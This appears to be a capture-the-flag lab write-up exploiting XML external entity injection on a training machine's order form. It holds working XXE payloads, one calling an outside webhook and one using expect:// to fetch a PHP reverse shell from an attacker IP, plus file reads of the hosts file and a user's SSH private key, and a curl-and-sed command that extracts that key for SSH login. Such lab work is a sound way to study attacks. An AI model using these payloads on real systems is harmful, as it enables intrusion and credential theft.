XXE Testing [Initial access]

We know that XML data is shared when we place an order. We will be exploiting this.

Introduction to XXE

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

Add this to the Cheat sheet and delete it after that.

Modify the request in the burp suite repeater. to test this XXE vulnerability.

We can see that after adding the payload. We got the same output that we were getting before. We didn't get any error. This means our payload is correct or XXE didn't work.

So, Let's test this in another way.

Webhook.site - Test, transform and automate Web requests and emailswebhook.site

To the above site, I will make a request and if it is interectped then this means that this is vulnerable to XXE. Update the response with below data.

<?xml version = "1.0"?>
<!DOCTYPE order [
  <!ELEMENT order ANY >
  <!ENTITY xxe SYSTEM "https://webhook.site/dbdeda9a-68a3-420b-81d9-213c0fb7a6a9" >]>
<order><quantity>
&xxe;
</quantity><item>Groceries</item><address>13, Big Splash, Sec 17, Nr Vashi Bus Depot, Vashi</address></order>

We got a warming message in response.

Despite the warming message, we can see that one request has been captured in webhook. Thus proving that it is vulnerable to XXE.

RCE [Not worked]

Original payload:

<!DOCTYPE root [
  <!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'1.3.3.7:8000/backdoor.php'">
]>

So, We need to make reverse shell code in PHP and then host a server. I have done it.

Making payload accounting to our scenario.

<!DOCTYPE order [
  <!ELEMENT order ANY >
  <!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'10.10.16.8/shell.php'" >]>

Not worked!!

Trying to set XXE value on the item field [Worked]

When I set my XXE payload on the item field and ran the command it showed output.

<?xml version = "1.0"?>
<!DOCTYPE order [
  <!ELEMENT order ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts" >]>
<order><quantity>2</quantity><item>
&xxe;
</item><address>Cooler</address></order>

Collecting SSH key

On the website, I discovered a username: Daniel. The Nmap results confirm that the SSH port is open. I will retrieve Daniel's SSH key.

<?xml version = "1.0"?>
<!DOCTYPE order [
  <!ELEMENT order ANY >
  <!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa" >]>
<order><quantity>2</quantity><item>
&xxe;
</item><address>Cooler</address></order>

I will store this SSH key in a file.

Make a curl command from the burp suite. Right-click on the response tab and click on "Copy as curl command".

I will be using the sed command with the "-n" option to capture all lines between the presented pattern.

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: 10.129.10.166' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: text/xml' -H $'Content-Length: 218' -H $'Origin: http://10.129.10.166' -H $'Connection: keep-alive' -H $'Referer: http://10.129.10.166/services.php' -H $'Priority: u=0' \
    -b $'PHPSESSID=398eclf9mj61urrl331ccf6oul' \
    --data-binary $'<?xml version = \"1.0\"?>\x0d\x0a<!DOCTYPE order [\x0d\x0a  <!ELEMENT order ANY >\x0d\x0a  <!ENTITY xxe SYSTEM \"file:///c:/users/daniel/.ssh/id_rsa\" >]>\x0d\x0a<order><quantity>2</quantity><item>\x0d\x0a&xxe;\x0d\x0a</item><address>Cooler</address></order>' \
    $'http://10.129.10.166/process.php' | sed -n '/-----BEGIN OPENSSH PRIVATE KEY-----/,/-----END OPENSSH PRIVATE KEY-----/p' > id_rsa

Set permission on the SSH key and connect to Daniel's user.

chmod 600 id_rsa
ssh -i id_rsa daniel@$markup

PreviousLooking at code NextPrivilege escalation [Worked]

Last updated 11 months ago

Was this helpful?

hashtagIntroduction to XXE

hashtagRCE [Not worked]

hashtagTrying to set XXE value on the item field [Worked]

hashtagCollecting SSH key

Introduction to XXE

RCE [Not worked]

Trying to set XXE value on the item field [Worked]

Collecting SSH key